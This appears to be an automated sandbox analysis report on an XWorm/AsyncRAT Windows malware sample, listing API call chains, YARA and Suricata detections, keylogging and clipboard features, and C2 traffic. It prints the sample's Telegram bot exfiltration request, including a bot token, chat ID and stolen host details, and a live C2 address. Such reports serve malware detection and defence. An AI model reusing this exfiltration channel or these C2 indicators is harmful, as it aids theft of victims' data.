                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EAC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00EAC2FF
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EACD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_00EACD9F
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EACD14 FindFirstFileW,FindClose,10_2_00EACD14
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EAF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00EAF5D8
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EAF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00EAF735
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EAFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00EAFA36
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_00354005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00354005
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0035C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_0035C2FF
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0035494A GetFileAttributesW,FindFirstFileW,FindClose,18_2_0035494A
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0035CD14 FindFirstFileW,FindClose,18_2_0035CD14
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0035CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,18_2_0035CD9F
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0035F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_0035F5D8
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0035F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_0035F735
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0035FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_0035FA36
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_00353CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00353CE2
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\438799Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\438799\Jump to behavior

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:64431 -> 193.41.226.233:2222
                Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 193.41.226.233:2222 -> 192.168.2.4:64431
                Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:64431 -> 193.41.226.233:2222
                Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.4:64427 -> 149.154.167.220:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: 193.41.226.233
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 23.2.RegAsm.exe.1030000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.3.Dump.pif.151caa0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.3.Dump.pif.151caa0.1.raw.unpack, type: UNPACKEDPE
                Source: global trafficTCP traffic: 192.168.2.4:64431 -> 193.41.226.233:2222
                Source: global trafficHTTP traffic detected: GET /bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=6795213026&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3CE6FBAD6367EB17AE37%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20L9CBEH%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWORM%20v5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                Source: Joe Sandbox ViewASN Name: AVORODE AVORODE
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownTCP traffic detected without corresponding DNS query: 193.41.226.233
                Source: unknownTCP traffic detected without corresponding DNS query: 193.41.226.233
                Source: unknownTCP traffic detected without corresponding DNS query: 193.41.226.233
                Source: unknownTCP traffic detected without corresponding DNS query: 193.41.226.233
                Source: unknownTCP traffic detected without corresponding DNS query: 193.41.226.233
                Source: unknownTCP traffic detected without corresponding DNS query: 193.41.226.233
                Source: unknownTCP traffic detected without corresponding DNS query: 193.41.226.233
                Source: unknownTCP traffic detected without corresponding DNS query: 193.41.226.233
                Source: unknownTCP traffic detected without corresponding DNS query: 193.41.226.233
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EB29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,10_2_00EB29BA
                Source: global trafficHTTP traffic detected: GET /bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=6795213026&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3CE6FBAD6367EB17AE37%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20L9CBEH%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWORM%20v5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: nAtuEYczbaU.nAtuEYczbaU
                Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: RegAsm.exe, 00000017.00000002.2973858744.000000000306C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: DA92phBHUS.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: DA92phBHUS.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                Source: DA92phBHUS.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                Source: DA92phBHUS.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                Source: DA92phBHUS.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                Source: DA92phBHUS.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                Source: DA92phBHUS.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                Source: DA92phBHUS.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: DA92phBHUS.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                Source: DA92phBHUS.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                Source: DA92phBHUS.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: DA92phBHUS.exeString found in binary or memory: http://ocsp.digicert.com0C
                Source: DA92phBHUS.exeString found in binary or memory: http://ocsp.digicert.com0N
                Source: DA92phBHUS.exeString found in binary or memory: http://ocsp.digicert.com0O
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: RegAsm.exe, 00000017.00000002.2973858744.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000000.1744485289.0000000000F09000.00000002.00000001.01000000.00000006.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, ImageSyncProX.scr, 00000012.00000002.1844874611.00000000003B9000.00000002.00000001.01000000.00000008.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: DA92phBHUS.exeString found in binary or memory: http://www.digicert.com/CPS0
                Source: RegAsm.exe, 00000017.00000002.2973858744.000000000305B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
                Source: RegAsm.exe, 00000017.00000002.2973858744.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.000000000305B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: Dump.pif, 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: RegAsm.exe, 00000017.00000002.2973858744.000000000305B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=67952
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: DA92phBHUS.exeString found in binary or memory: https://www.digicert.com/CPS0
                Source: Dump.pif.1.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.drString found in binary or memory: https://www.globalsign.com/repository/06
                Source: unknownNetwork traffic detected: HTTP traffic on port 64427 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64427
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:64427 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to log keystrokes (.Net Source)
                Source: 10.3.Dump.pif.151caa0.1.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                Source: 10.3.Dump.pif.151caa0.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                Source: C:\Users\user\Desktop\DA92phBHUS.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EB4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00EB4830
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_00364830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,18_2_00364830
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EB4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00EB4632
                Source: C:\Users\user\Desktop\DA92phBHUS.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00ECD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_00ECD164
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0037D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,18_2_0037D164

                Operating System Destruction

                barindex
                Protects its processes via BreakOnTermination flag
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exeProcess information set: 01 00 00 00 Jump to behavior

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 23.2.RegAsm.exe.1030000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 10.3.Dump.pif.151caa0.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 10.3.Dump.pif.151caa0.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 10.3.Dump.pif.151caa0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 10.3.Dump.pif.151caa0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Wscript called in batch mode (surpress errors)
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js"
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E60E38 CloseHandle,NtResumeThread,10_2_00E60E38
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EA42D5: CreateFileW,DeviceIoControl,CloseHandle,10_2_00EA42D5
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E98F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00E98F2E
                Source: C:\Users\user\Desktop\DA92phBHUS.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_00403883
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EA5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_00EA5778
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_00355778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,18_2_00355778
                Source: C:\Users\user\Desktop\DA92phBHUS.exeFile created: C:\Windows\BlogPsJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeFile created: C:\Windows\JamMerchantJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeFile created: C:\Windows\RespectiveSexualJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeFile created: C:\Windows\GeneticsFamiliarJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeCode function: 0_2_0040497C0_2_0040497C
                Source: C:\Users\user\Desktop\DA92phBHUS.exeCode function: 0_2_00406ED20_2_00406ED2
                Source: C:\Users\user\Desktop\DA92phBHUS.exeCode function: 0_2_004074BB0_2_004074BB
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E4B02010_2_00E4B020
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E494E010_2_00E494E0
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E49C8010_2_00E49C80
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E623F510_2_00E623F5
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EC840010_2_00EC8400
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E7650210_2_00E76502
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E4E6F010_2_00E4E6F0
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E7265E10_2_00E7265E
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E6282A10_2_00E6282A
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00E789BF10_2_00E789BF
